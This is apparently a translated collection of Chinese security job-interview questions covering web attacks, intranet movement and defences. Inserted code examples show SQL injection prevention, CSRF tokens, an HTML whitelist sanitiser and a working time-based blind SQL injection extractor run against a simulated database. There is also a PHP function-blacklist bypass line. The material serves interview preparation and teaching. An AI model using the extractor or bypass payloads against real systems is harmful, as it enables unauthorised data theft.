200 network security interview questions in 2023 (recommended collection)

  • 0x09 Alibaba - Alibaba Cloud Security
  • 0x0A
  • 0x0B ByteDance - Wuheng Lab
  • 0x0C 58.com (58 Tongcheng) - Security Engineer
  • 0x0D Tencent - Xuanwu Lab
  • 0x0E 360 - Security Engineer
  • 0x0F Kuaishou - Security Intern
  • 0x10 Huashun Xin'an - Security Service Engineer
  • 0x11 Qi Anxin interview review
  • 0x12 JD.com - Security R&D
  • 0x13 Anheng (DBAPPSecurity) interview review
  • 0x14 Zhejiang east coast detection
  • 0x15 360 - Security Engineer Internship
  • 0x16 Internship at a certain front-line laboratory
  • 0x17 Tencent - Keen Lab Internship
  • 0x18 Interview review at a "four-character" company (large company with a four-character name)
  • 0x19 Internship interview review at a "four-character" company
  • 0x1A Interview review at a "two-character" company
  • 0x1B A security company - Security Researcher

Acknowledgements

Thanks to PolarPeak, lalalashenle and 4ra1n for sharing!

0x00 ByteDance - Penetration Testing Intern

Byte's internal referral through a friend was very efficient: I submitted my resume in the morning and the interview was scheduled for the afternoon. Going in cold was painful, so I recommend reviewing beforehand.
  1. Self-introduction
  2. The penetration testing process
  3. How to handle wildcard DNS (泛解析) when brute-forcing subdomains during reconnaissance
  4. How to bypass a CDN and find the origin IP
  5. What information do you look for in phpinfo
  6. Do you know about persistence (权限维持)?
  7. Talk about a vulnerability you are proud of, in detail
  8. How to defend against XSS when the output lands in an href attribute
  9. How SameSite cookies defend against CSRF
  10. CSRF defences
  11. How to defend against CSRF for JSON requests
  12. Browser parsing order and decoding order
  13. How to bypass SQL injection filtering that blocks commas
  14. How to bypass when the comma in LIMIT is filtered
  15. fastjson-related vulnerabilities
  16. Talk about a Python-related vulnerability you know (SSTI principle, exploitation process, payloads); open-ended discussion

0x01

0x02 Sangfor - Vulnerability Researcher Internship

Duration: 15 minutes

  1. Self-introduction
  2. What did you do during your internship at xx
  3. Briefly explain your approach to penetration testing
  4. What role did you play in the HW (护网) exercise?
  5. Some thoughts on red teaming
  6. Did you move laterally after compromising the system?
  7. Did you research log4j recently? Can you talk about it briefly?
  8. (Follow-up) What are the ways to bypass obfuscation
  9. Do you know about memory-resident webshells (内存马)?
  10. Have you heard of tools like Behinder (冰蝎) and Godzilla (哥斯拉)?
  11. On the attack team, did you research any attacks, for example tooling or modifying existing tools?
  12. Of the many vulnerabilities and attacks, which are you best at?
  13. Explain the root cause of Shiro deserialization and the gadget chain
  14. Do you know any bypass methods? Can you briefly introduce them?
  15. Questions for the interviewer

0x03

0x04 ByteDance - Security Research Intern

First round

Duration: 50 minutes

  1. You applied for the Security Research Intern position. Do you know what we mainly do here?
  2. Self-introduction
  3. Is there a direction you want to pursue now? Your code audit work, attack and defence exercises, and your research direction at school (cryptography) are really three different directions. Is there one you want to do now?
    1. Spoke about code audit and security research
  4. Have you audited open-source frameworks, CMSs, middleware, etc.?
  5. The interviewer introduced the job content
  6. I see several internships and projects on your resume. Let's start with the internships. What did you mainly do at A?
  7. Talk in detail about what the intrusion detection work involved and the problems you encountered
  8. Did you analyse why intrusion detection produced so many false positives, and is there a better solution?
  9. Compared with A, B should be more offensive, right? There is "fighting" (unclear; the interviewer seemed to say that) and code audit. What did you mainly do at B?
  10. The steps and ideas for auditing the expression engine
  11. The audit you just described sounds like an ordinary development review, done through program flow and documentation. Have you audited any project from a security perspective?
  12. How XXE arises, at the code level
  13. I see a lot of attack and defence exercise experience on your resume. Is any of it particularly memorable? Pick one and talk about it
  14. It seems your attacks mostly relied on weak passwords. Do you have more skilful methods?
  15. How was the webshell uploaded through the avatar upload?
  16. What other ways are there to test it? How to bypass it?
  17. The log4j vulnerability has been very popular these two days. Have you looked at it?
  18. The interviewer introduced the business
  19. Questions

Additional first round - Security R&D Intern

A very strange turn of events. After the interview, the interviewer told me there were offices in Beijing and Shenzhen and asked whether I wanted Shenzhen; I said yes. More than a week later HR told me that because my interviewer was from Beijing and I had chosen Shenzhen, that round did not count and another one was scheduled. Then at noon that day came the rejection ("thank-you") letter, and when I checked the status on the official website the process had been terminated. It turned out the position had become Security R&D, while I had originally applied for Security Research...

Duration: 45 minutes

  1. Self-introduction
  2. What did you do during the HW (护网) exercise
  3. At which layer did you work: WAF? IDS?
  4. What problems did you encounter, and which solution was memorable
  5. How did you handle the large number of false positives, and what rules did you write to solve it
  6. Were the intranet false positives on the office network or the production network?
  7. For example, MySQL executing PowerShell: how do you protect against that (I had mentioned that many intranet false positives were triggered by people writing PowerShell scripts)
  8. Have you dug on SRC (security response centre) platforms
  9. When doing attack and defence, do you have any experience in asset collection?
  10. An organisation may have more than one top-level domain. How do you collect all of an organisation's domains? Note: domains, not subdomains
  11. Any other asset collection experience?
  12. Besides information collection, any attack cases involving vulnerabilities?
  13. Talk about SQL injection
  14. How to defend against it
  15. How to defend against injection in ORDER BY
  16. When defending with character escaping, what do you do with database column or table names that contain special characters?
  17. Wide-byte injection
  18. Do you understand SSRF
  19. How to fix it
  20. Regarding blacklist/whitelist fixes: production now mostly runs on Docker, IPs change at any time and everything may be different after a container restart. How do you fix it then?
  21. fastjson deserialization
  22. Redis vulnerabilities
  23. MySQL privilege escalation
  24. Shiro deserialization
  25. Log4j is very popular recently; talk about the principle
  26. Analysis process and principle of JNDI
  27. Is there anything you did well that I haven't asked about? Feel free to talk about it
  28. As usual, the interviewer introduced the department's main business
  29. Routine questions for the interviewer
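Questions 13 to 16 above (how to defend against SQL injection, how to handle ORDER BY, and what to do when escaping meets identifiers with special characters) recur in 0x05, 0x0C and 0x0F. The block below is an added example, not code from any of these interviews: the user-controlled value is bound as a parameter, while the ORDER BY column, which cannot be bound, goes through a closed whitelist and is quoted as an identifier rather than escaped as a string. The in-memory SQLite table, its column names and the API sort keys are constructed for the example.

```python
import sqlite3

# Constructed in-memory stand-in for the application's user table; the hyphenated column
# models question 16 (an identifier that cannot appear unquoted).
conn = sqlite3.connect(":memory:")
conn.execute('CREATE TABLE user (userid INTEGER, name TEXT, "odd-col" TEXT)')
conn.executemany("INSERT INTO user VALUES (?, ?, ?)",
                 [(1, "alice", "x"), (2, "bob", "y"), (3, "carol", "z")])


def find_user_vulnerable(userid):
    """The interview's starting point: the parameter is pasted into the statement."""
    sql = f"SELECT userid, name FROM user WHERE userid = {userid}"
    return conn.execute(sql).fetchall()


def find_user_safe(userid):
    """Bind the value as a parameter: the driver ships it as data, so it can never
    change the SQL grammar. '1 OR 1=1' is compared as one literal and matches nothing."""
    return conn.execute("SELECT userid, name FROM user WHERE userid = ?", (userid,)).fetchall()


# ORDER BY cannot take a bound parameter (binding would sort by a constant), so the
# sortable columns are a closed whitelist keyed by the name the API exposes (assumption).
SORTABLE = {"id": "userid", "name": "name", "odd": "odd-col"}


def quote_ident(name):
    """Identifiers are quoted, not string-escaped: double quotes in standard SQL, SQLite and
    PostgreSQL (MySQL uses backticks), with any embedded quote doubled. That is the answer to
    'what about column names with special characters'."""
    return '"' + name.replace('"', '""') + '"'


def list_users(sort_by="id", direction="asc"):
    column = SORTABLE.get(sort_by)
    if column is None or direction.lower() not in ("asc", "desc"):
        raise ValueError("unsupported sort parameter")
    sql = f"SELECT name FROM user ORDER BY {quote_ident(column)} {direction.upper()}"
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    print(find_user_vulnerable("1 OR 1=1"))   # every row leaks
    print(find_user_safe("1 OR 1=1"))         # []
    print(list_users("name", "desc"))
```

The whitelist answers the 0x0C follow-up ("what if R&D won't rewrite every query to use prepared statements?") only for the parts of a statement that cannot be bound; values still need binding, and a rejected sort key should fail loudly rather than fall back to a default so that probing is visible in logs.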

Second round

Immediately after the additional first round, with a 10-minute gap; the second round started while I was halfway through writing up the first.

Duration: 25 minutes

  1. Talk about an attack and defence exercise experience you are proud of
  2. What are you good at in security?
  3. What do you usually audit, Java? Python?
  4. Do you understand CSRF, and how to fix it
  5. What is your audit process when you are handed the code of a Java system?
  6. How to defend against and fix SQL injection in a Java system
  7. What does the browser do when you enter a domain name in the address bar
  8. What vulnerabilities usually appear on a system's login page
  9. Do you understand cloud security?
  10. Have you developed security tools, such as a WAF or scanner?
  11. Usual business introduction
  12. Routine questions for the interviewer

0x05 Chaitin Technology-Security Service Engineer

First round

Duration: 30 minutes

  1. Self-introduction
  2. Have you practised web penetration testing?
  3. Talk about the principle of SQL injection
  4. Do you understand the cause of SQL injection at the code level (if "code level" means the SQL statement, the answer is yes)
  5. If you don't, do you understand the principle of XSS at the code level
  6. Which of the OWASP Top 10 vulnerabilities are you most familiar with
  7. How to defend against SQL injection
  8. How SQL injection bypasses filtering
  9. Asked whether xx was a target during the HW exercise, and whether I had analysed the attacking team's behaviour
  10. What the HW work at xx involved, and whether I analysed traffic and packets
  11. The role I played in the school's attack and defence exercise, the main work, the penetration testing approach and the results (this question was quite detailed: the assigned tasks, whether hosts or the domain controller were taken down, the format and duration of the exercise)
  12. I usually play a lot of CTF; what results?
  13. Do you follow new vulnerabilities, do you do code audits, e.g. Shiro vulnerabilities; have you reproduced vulnerabilities?
  14. Do you know anything about phishing emails?
  15. What is your current direction of study
  16. Finally, the interviewer introduced the talent requirements
  17. Questions

Second round

Duration: 34 minutes

  1. Self-introduction
  2. Which language do you prefer for code auditing? Which language are you good at?
  3. Given PHP code to audit, what is your audit process?
  4. Are you familiar with PHP development frameworks such as ThinkPHP?
  5. If the given source uses the ThinkPHP framework, how does the audit differ from one without a framework, in process or focus?
  6. What are PHP's native sensitive functions; for example, which ones do you search for by keyword?
  7. Do you understand deserialization vulnerabilities?
  8. When unserialize() deserializes a string, some magic methods of the object are called automatically. When looking for a deserialization chain, which magic methods can serve as the starting point?
  9. Have you audited real projects, such as open-source CMSs on GitHub
  10. Can we talk about Java auditing?
  11. Apart from CTF, have you done a complete penetration project?
  12. Can you tell me about the bugs you found and how you found them?
  13. Are you familiar with vulnerabilities like SSRF? Explain the principle and how to exploit it
  14. What can SSRF do, and what effect can it achieve
  15. In a PHP environment, how to get the most out of SSRF: get a shell or pivot into the intranet
  16. How to use a compromised intranet machine to request intranet services
  17. Suggestions for fixing SSRF, and what details to pay attention to
  18. If you fix SSRF with a whitelist, extracting the target from a user-supplied variable, what should you pay attention to, given that some URLs bypass the whitelist through special characters? What details matter when extracting the variable?
  19. What is the difference between === and == in PHP
  20. How to find the common entry functions in PHP code
  21. Some PHP frameworks handle URL routing for us. Are you familiar with these routing methods?
  22. Introduce variable overwriting in PHP
  23. A PHP program allows file inclusion. To avoid a file inclusion vulnerability, what should you pay attention to when writing the code?
  24. Remote file inclusion vs local file inclusion: which PHP settings are involved in each
  25. Can PHP configuration (rather than code) restrict the paths a local file inclusion can reach?
  26. Which vulnerability are you most familiar with in PHP and Java code audit
  27. What methods does PHP have for defending against SQL injection
  28. Java defences against SQL injection
  29. Do you understand second-order SQL injection? Can you introduce it?
  30. How to prevent second-order injection when writing code

0x06 Tianrongxin interview review

Duration: 15-20 minutes

  1. Have you done penetration testing in a real environment? Have you submitted to SRC platforms?
  2. How much do you know about AV evasion (免杀)? Can the trojan you build get past 360?
  3. CTF results? What kind of challenges are you good at?
  4. Results in attack and defence exercises?
  5. Do you understand the Shiro vulnerability? Explain the principle
  6. Under Linux there is a text file with a large number of IP addresses, many duplicated. How do you quickly remove the duplicates?
  7. In an intranet penetration you gained host access through a phishing email, but found that the intranet blocks outbound TCP traffic. How do you communicate in this situation?
  8. How is your coding ability? Have you done code audits?
  9. What direction are you currently interested in?

0x07 Tencent-Security Technology Intern

Duration: 15 minutes

  1. Self-introduction
  2. Do you understand SQL injection? Explain the principle of second-order injection
  3. How to fix second-order injection
  4. Do you understand WAF bypass for SQL injection? If the WAF filters the keyword `information`, how do you bypass it?
  5. Redis unauthorised access
  6. The complete process of a penetration test
  7. Any particularly memorable CTF challenges?
  8. Is there a better way to exploit an arbitrary file download vulnerability?
  9. With an arbitrary file download, which file names do you look for (which files are generally read; in CTF? in practice?)
  10. Command execution vulnerability: what is the best approach when HTTP cannot reach out (please elaborate)
  11. Following on: communicating through tunnels; explain in detail what kind of tunnel and the specific operations
  12. Vulnerability advisories
  13. Have you reproduced a middleware vulnerability (have you ever reproduced a vulnerability end to end)
  14. What were your main responsibilities in the school's attack and defence exercise?

0x08 XPeng Motors - Security Engineer

Duration: 37 minutes

  1. Self-introduction
  2. Have you dug on SRC platforms?
  3. How do you usually learn web penetration? Any real-world practice? Have you successfully found a vulnerability?
  4. What tools have you used for web penetration
  5. What is XXE? What is SSRF?
  6. Which direction are you responsible for when playing CTF?
  7. Why do you want to work in information security, how interested are you, will you change careers, or do you plan to stay in security
  8. How do you usually learn security? If asked to take on a new direction (app security), how much time would you need to learn it, or do you have a direction you want to do?
  9. Talk about the process of code audit
  10. How do you usually do code auditing?
  11. Have you audited open-source frameworks and CMSs?
  12. How to judge whether a database is MySQL or Oracle?
  13. Types of SQL injection and how to exploit them?
  14. Talk about the principle of SQL injection and defence ideas
  15. Which language have you used for development?
  16. Which framework did you use for Java development? Can you do Java security development?
  17. Have you done Android development?
  18. Have you written tools in Python?
  19. Which vulnerability did you exploit with msf, and did you get a reverse shell?
  20. What did you mainly do during the HW exercise; talk about your understanding of security products
  21. The company now needs someone for app security. If you were to do it now, would you learn it, are you interested, or do you have other things you want to do? If you don't want to do app security, how much time could you spend learning it?
  22. Do you understand intranet penetration? Talk about your approach to intranet penetration


Next, 0x09-0x0B are interview writeups from the same blogger, originally posted on Nowcoder (牛客). I found them very good after reading them, so I reposted them here. I also attach links to this blogger's interview questions and study notes, which I personally found very good
CSDN network security - common interview questions
CSDN network security - self-study notes

0x09 Alibaba - Alibaba Cloud Security

First round

  1. Introduce yourself; talk about your projects and extracurricular practice
  2. Has the backend API of the WAF management platform been stress tested?
  3. Has your current paper been published?
  4. What is your dissertation about?
  5. What was your biggest gain from the ByteDance training camp?
  6. Anything meaningful to share from graduate school or daily life?
  7. What is the time complexity of quicksort?
    1. What is the best case, and when does it occur?
    2. What is the worst case, and when does it occur?
  8. What solutions are there for hash collisions?
  9. Programming question (easy)

Second round

  1. Introduce yourself
  2. We run a key and credential management service here. How much do you know about cryptography?
  3. Do you prefer security research or security R&D for your future plans?
  4. Are you interested in PKI security and identity authentication capabilities on the cloud?
  5. Tell us what you did in the ByteDance training camp
    1. What are the principles of SQL injection and the defence schemes?
    2. What is the principle of WAF protection against SQL injection?
    3. How did the team work together in the training camp? What was your role and your contribution? Was there room to improve efficiency?
    4. Was the vulnerability mining purely tool-based, or was there manual work?
    5. What are the functions of the backend API of the WAF management platform?
    6. Does the WAF involve a large volume of create/read/update/delete operations?
    7. What problem does Redis solve?
    8. How do you keep Redis and the DB consistent for hot data?
    9. How is user login authentication done?
    10. How do you protect the security of the token?
    11. How should the content of the token be designed?
    12. How do you ensure that the data is not tampered with?
  6. Ideas for SDN vulnerability mining?
    1. Did the vulnerability mining find an RCE?
    2. Any research on stack overflows and heap overflows?
  7. Describe the HTTPS handshake
    1. How many random numbers are there?
    2. What if there were only one?
  8. Are you familiar with C++ or C?
  9. The principle of hash tables and collision resolution (repeated from the first round)
  10. Why are MySQL queries fast?
    1. The four properties of transactions (ACID); MySQL isolation levels?
    2. Explain optimistic locking and pessimistic locking
  11. Have you done concurrent programming?
    1. Have you used read-write locks and mutexes/exclusive locks? What's the difference? Why use them?
  12. You hold a software copyright; what software did you make?
  13. Programming question (medium)

Third round (cross-team interview)

  1. How did you solve the broken access control (越权) problem in the ByteDance training camp?
    1. Does the firewall use rules you wrote yourselves?
    2. Everyone had the same task and you won first place; where did your team do well?
  2. SDN vulnerability mining project: can you name a more technical vulnerability? Principle and mining process?
  3. The difference between Python 2 and Python 3?
    1. What do xrange and range return?
  4. The role of database indexes? Changes in MySQL indexes?
  5. The database password is weak; how do you escalate privileges after logging in?
  6. In your own project, how do you defend against SQL injection?
  7. How do you defend against CSRF?
    1. What does the token encrypt?
    2. What is checked?
    3. Why does the token need to be encrypted?
    4. Is a plaintext random number acceptable?
  8. How to prevent replay attacks?
  9. What are the security benefits of Docker?
  10. Personal development direction?
  11. Where do you currently practise daily?
  12. How long have you been an intern? Why do you want to come to Ali?
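For the CSRF token questions above (what the token "encrypts", what is checked, whether a plaintext random number is enough) and the replay question, here is an added example, not from the interview. A plaintext random number is fine in the synchroniser-token pattern, where the server stores it per session and compares on each request. The stateless alternative shown here needs no storage for validity: an HMAC under a server-side key binds the token to the session id and an issue time. Only integrity and binding are required, not confidentiality, so the token is signed rather than encrypted. Replay is handled by accepting each nonce once. The key, the session ids, the one-hour lifetime and the in-process nonce set are assumptions.

```python
import base64
import hashlib
import hmac
import os
import time

# Assumption: a per-deployment secret that never reaches the client; rotate like a session key.
SERVER_KEY = os.urandom(32)


def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _mac(session_id, nonce, ts):
    # The MAC is what the server checks: it binds nonce and time to THIS session, so a token
    # lifted from another session (or minted by the attacker) fails. Nothing is encrypted;
    # the token carries no secret, it only has to be unforgeable and session-bound.
    return _b64(hmac.new(SERVER_KEY, f"{session_id}|{nonce}|{ts}".encode(), hashlib.sha256).digest())


def issue_token(session_id, now=None):
    """Token embedded in a form or sent in a header: nonce.issued_at.mac (URL-safe)."""
    nonce = _b64(os.urandom(16))
    ts = str(int(time.time() if now is None else now))
    return f"{nonce}.{ts}.{_mac(session_id, nonce, ts)}"


class TokenVerifier:
    """Checks MAC, session binding, age and single use. Single use is the replay defence for
    state-changing endpoints; `used` is an in-process set here (assumption), a shared cache in
    a multi-node deployment."""

    def __init__(self, max_age=3600):
        self.max_age = max_age
        self.used = set()

    def verify(self, token, session_id, now=None):
        now = time.time() if now is None else now
        try:
            nonce, ts, mac = token.split(".")
            issued = int(ts)
        except (ValueError, AttributeError):
            return False
        if not hmac.compare_digest(_mac(session_id, nonce, ts), mac):   # constant-time compare
            return False
        if now - issued > self.max_age or issued > now + 60:             # expired or from the future
            return False
        if nonce in self.used:                                           # replay
            return False
        self.used.add(nonce)   # only after the MAC passed, so attackers cannot poison the set
        return True


if __name__ == "__main__":
    v = TokenVerifier()
    t = issue_token("sess-A")
    print(v.verify(t, "sess-A"), v.verify(t, "sess-A"), v.verify(t, "sess-B"))  # True False False
```

The token is still only useful if the session id it is bound to is not itself readable by the attacker's page, which is why it pairs with SameSite cookies rather than replacing them, and why the same-origin check on the Origin/Referer header remains a cheap second layer.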

0x0A

0x0B ByteDance - Wuheng Lab

  1. Self-introduction
  2. Introduce the Alibaba internship
  3. Introduce the Venustech internship
  4. Was the message queue self-developed or open source? What is it called?
  5. Task dispatch? Status monitoring?
  6. How did you write the subdomain scanning plugin?
  7. How did you write the fingerprinting plugin?
  8. How does Wappalyzer do fingerprinting?
  9. The process of finding the XSS vulnerability on CSDN?
  10. The principle of SQL injection?
  11. What are the current ways to defend against SQL injection?
  12. Which SQL statements cannot be parameterised (precompiled)?
  13. How do you determine the injection point in SQL injection?
  14. Given that http://example.com/?id=1 is MySQL, how do you get the MySQL version?
  15. What do you do when there is no echo? Out-of-band via ceye/dnslog
  16. What about out-of-band?
  17. The principle of CSRF?
  18. How do you attack when CSRF uses a POST request? Hidden form
  19. Without a form?
  20. Sending a POST request with AJAX?
  21. How many packets does an AJAX POST request send?
  22. If you were asked to write a CSRF attack plugin, how would you write it? What modules would it include?
  23. The principle of SSRF?
  24. If you were asked to write an SSRF plugin, how would you write it?
  25. Questions
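Questions 13 to 16 above (finding the injection point, pulling the MySQL version, what to do with no echo) and the 0x0C scenario later on this page (`select * from user where userid = {}` with an empty response body, where anything over one second returns a 404) are the same exercise: turn a yes/no side channel into data. DNS out-of-band is one answer; the block below is the other, a time-based blind extraction, added here as an example and not taken from either interview. The target database, the table contents and the simulated oracle are constructed; the conditions are written in SQLite syntax, with the MySQL equivalents noted in comments.

```python
import sqlite3

# Constructed target standing in for the interview's `user` table (not a real system).
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE user (userid INTEGER, name TEXT, pwd_hash TEXT)")
_db.execute("INSERT INTO user VALUES (1, 'alice', 'e3b0c442')")


def mysql_payload(condition, seconds=2):
    """What the userid parameter would carry against MySQL (built here, never sent): the body is
    empty either way, but when `condition` holds the SLEEP pushes the request past the 1 s
    gateway timeout and the client sees a 404 instead of a 200. That 404 is the 'true' bit."""
    return f"1 AND IF({condition}, SLEEP({seconds}), 0)"


def simulated_oracle(condition):
    """Stand-in for 'did we get the 404?'. Instead of sleeping, evaluate the condition in SQLite.
    Conditions below use SQLite's length()/unicode()/substr(); in MySQL that is
    LENGTH() and ASCII(SUBSTRING(...))."""
    return bool(_db.execute(f"SELECT {condition}").fetchone()[0])


def binary_search(oracle, greater_than, lo, hi):
    """Smallest v in [lo, hi] for which oracle(greater_than(v)) is False, i.e. the hidden value.
    About 7 requests per character instead of up to 128 linear probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(greater_than(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle, subquery, max_len=64):
    """Recover the string produced by `subquery` one character at a time through the oracle."""
    length = binary_search(oracle, lambda v: f"length(({subquery})) > {v}", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = binary_search(
            oracle, lambda v, i=i: f"unicode(substr(({subquery}), {i}, 1)) > {v}", 0, 127)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    print(mysql_payload("LENGTH((SELECT VERSION())) > 4"))
    print(extract(simulated_oracle, "SELECT sqlite_version()"))   # the 'get the version' question
    print(extract(simulated_oracle, "SELECT pwd_hash FROM user WHERE userid=1"))
```

Against a real target the oracle is the HTTP status, and the two-second sleep must comfortably exceed the gateway timeout so that jitter does not flip bits; repeating each probe and taking a majority vote is the usual fix when it does.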

0x0C 58 Tongcheng-Security Engineer


  1. Please introduce yourself first

Suppose there is a SQL injection as follows:

select * from user where userid = {};

  1. How would you inject in this case?
    1. The response contains no content
    2. Anything over 1 s times out and returns the 404 page directly
  2. Suppose I am writing a security SDK

How would you write the SQL injection fix (pseudocode)?

    1. Answer: I tend to use parameterised (precompiled) queries

But what if R&D won't use parameterised queries? If they think changing every statement is too troublesome, can it be more convenient? Because with parameterisation I have to change every SQL statement and every query.

    1. A: How about designing a whitelist?
    2. Then roughly describe how to design the whitelist. You can split it by scenario: in which scenarios SQL injection occurs, and what operations should be done on the parameters
    3. How to write the XSS fix (pseudocode)? Answer: HTML entity escaping

But we have a scenario: here where we upload resumes, sometimes uploading an HTML resume is supported, right? The business itself needs HTML; if you HTML-entity-escape everything, the business breaks. In this case how do we write an XSS filter, or escaping, for a scenario like the resume? Think about it; it doesn't matter if you can't write the code.

    1. A: Whitelist restrictions, blacklist filtering.
    2. Actually this is what we do ourselves. For this case we first maintain a whitelist of HTML tags, and second a whitelist of events (attributes). We don't use blacklists.

RCE fix, how to write it (pseudocode) (Java or Python command execution)? Answer: whitelist restrictions; only allow the functions that are needed. But for RCE, I feel that in business scenarios it generally does not appear much. Interviewer: Well, it appears a lot for us, especially in the operations department.

    1. Me: I play a lot of CTF, and the RCE I know is all PHP, for example system, popen, etc. Generally these are filtered directly

Then if these PHP functions are all blacklisted, what else can you do?

    1. Answer: string concatenation, e.g. $a = 'p'.'h'.'p'.'i'.'n'.'f'.'o'; $a();

Have you used backticks in PHP?

    1. Answer: there is also chr() to bypass
    2. Interviewer: encoding, right?
    3. How to write the XXE fix (pseudocode)? Answer: For XXE I only know the attack side, not much about defence. The attack is XML external entity injection; an attack template can read files and can execute commands
    4. How does XXE execute commands? Take PHP as an example
    5. Command execution via XXE requires the server itself to support certain special protocols, which is generally not the case

Have you learned about automated code audit tools, similar to Fortify?

  1. Answer: I have only used an older one, I can't remember the name (meaning Seay)

It doesn't matter. Do you know roughly how they work?

  1. Me: The principle is generally to locate potentially vulnerable functions by matching certain sensitive functions

But then the false positive rate is very high, like my RCE example: if you match directly, many are false positives and many are not even web-facing.

  1. Me: Another way is to add custom rules

Is there a better way? We can't accept too many false positives.

  1. Me: One idea: after the tool has matched, verify again from the front end at the black-box level
  2. Interviewer: For black-box verification I have a requirement. First I need to know which entry point in my PHP code the input comes from, right? But it may have been called layer by layer, possibly even through include(). In that case I don't know which entry points it affects. What do you do then?
  3. Did you study compiler principles at school?
  4. Actually I think security majors still need to learn compiler principles.
  5. Have you done Linux post-exploitation?
    1. Interviewer: For example, I have compromised this Linux box and want to get more information, such as lateral movement information. Have you done that? Me: I don't know much about this, but I know a little about Windows
    2. Interviewer: Then talk about it briefly. Say you first compromise a Windows machine and then want to move laterally in the Windows domain and get domain privileges. How do you do it? Me: Forge tickets, silver tickets and golden tickets. Interviewer: How do you forge these tickets? Me: Generally with mimikatz
    3. Interviewer: What mimikatz captures are passwords in memory and some tickets. So if I am low-privileged I can't capture passwords, or the user passwords I capture are not domain accounts but low-privilege accounts, because most compromises are of an application, and the application may not have domain privileges. Me: Escalate from the low privilege
    4. Interviewer: Then how do you usually escalate privileges? Me: Generally through Windows vulnerabilities. Interviewer: Then use this Windows system to escalate privileges. I have a webshell now; how do I escalate?
    5. Interviewer: You can do this: upload a privilege escalation script or exe, and running the exe from the webshell elevates the privileges of the web application
  6. So is there anything you want to ask me?
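The resume-upload discussion above (a whitelist of HTML tags plus a whitelist of events/attributes, no blacklist) and 0x00's question about XSS landing in an href are answered by the same sanitiser design. The following is an added example and not 58.com's filter: it rebuilds the fragment from the parser's token stream, keeping only whitelisted tags and per-tag attributes (which discards every on* handler and style), drops <script>/<style> content, and allows href/src only with http, https, mailto or relative URLs. The allowed sets are assumptions for a resume; in production prefer a maintained sanitiser (bleach, DOMPurify) that tracks parser quirks, and treat this as an illustration of the whitelist approach.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumptions: a resume needs basic formatting, lists, headings, links and images; nothing else.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "ul", "ol", "li", "h1", "h2", "h3", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}   # per tag; on*, style never listed
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto", ""}                    # "" is a relative URL
VOID_TAGS = {"br", "img"}


def safe_url(value):
    """Whitelist the scheme of the parsed URL; rejects javascript:, data:, vbscript: and anything
    unparseable. urlsplit lowercases the scheme and strips tab/newline, so 'JAVA\\nSCRIPT:' fails."""
    try:
        scheme = urlsplit(value.strip()).scheme
    except ValueError:
        return False
    return scheme in SAFE_SCHEMES


class WhitelistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside <script>/<style>, whose text is dropped

    def handle_starttag(self, tag, attrs):           # tag and attribute names arrive lowercased
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return                                   # drop the tag, keep its text content
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                             # this is what removes onclick/onerror/onload
            if name in URL_ATTRS and not safe_url(value or ""):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))   # text is re-escaped on the way out


def sanitize_html(fragment):
    parser = WhitelistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    print(sanitize_html('<p onclick="evil()">Hi <a href="javascript:alert(1)">cv</a>'
                        '<img src="x" onerror="alert(1)"><script>alert(1)</script></p>'))
```

Because the output is regenerated token by token, nothing from the input reaches the page as raw markup; an attacker can only influence which whitelisted tags and attribute values appear, and the values are entity-encoded. Attribute whitelisting rather than event blacklisting is what makes the design survive new event names and browser-specific attributes.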

0x0D Tencent-Xuanwu Lab

  1. Self-introduction
  2. Explain the principle of CSRF
  3. When did you start with web security
  4. Why did you learn web security
  5. Which competitions have you participated in?
  6. What role did you play
  7. Talk about deserialization
  8. Tell me about major security issues you have followed recently
  9. Then tell me about the one that impressed you most
  10. I see black-box testing on your resume; tell me about it
    1. One was testing a wallet and the other an exchange. The wallet was mainly information leakage and horizontal privilege escalation
  11. How did you find them
    1. Information leakage: the webpack bundle exposed API call information directly; horizontal privilege escalation: crafting JSON requests returned other users' data, account passwords, etc.
  12. How did you construct them
  13. Let's move on to the exchange
  14. (Blockchain related) Talk about the instruction set involved in parameter reception in the reversed function
  15. Talk about reentrancy vulnerabilities
  16. Do you know about the biggest blockchain security incident recently?
  17. OK, what is your exposure to cryptography?
  18. I see many DeFi audits on your resume; do you have experience in finding vulnerabilities?
  19. Now a question: think about how to find possible flaws in the economic models set up by DeFi projects
  20. Tell us your guesses about new types of vulnerabilities that may appear in the future
  21. There is a game that rewards you for guessing the correct answer
  22. Questions for the interviewer

0x0E 360-Security Engineer

  1. Self-introduction
  2. WAF and how to bypass it
  3. IPS/IDS/HIDS
  4. Cloud security
  5. How to bypass Security Knight (安骑士), Safe Dog (安全狗), etc.
  6. Using gopher:// to expand the SSRF attack surface
  7. Struts2 vulnerabilities
  8. UDF privilege escalation
  9. DOM XSS
  10. Database privilege escalation
  11. How to exploit Redis
  12. Intranet penetration
  13. Container security
  14. k8s / Docker escape
  15. Linux and Windows commands: filter files, view a process's environment variables
  16. How to get a webshell when the web server and database are on separate hosts (站库分离)

0x0F Kuaishou-Security Intern

one side

  1. Self introduction
  2. ask item
  3. A lot of detailed questions were asked about the project, and it is not convenient to disclose them. The general questions are as follows:
  4. Did you encounter any problems when working on the project and how to solve them?
  5. What did you learn from the project?
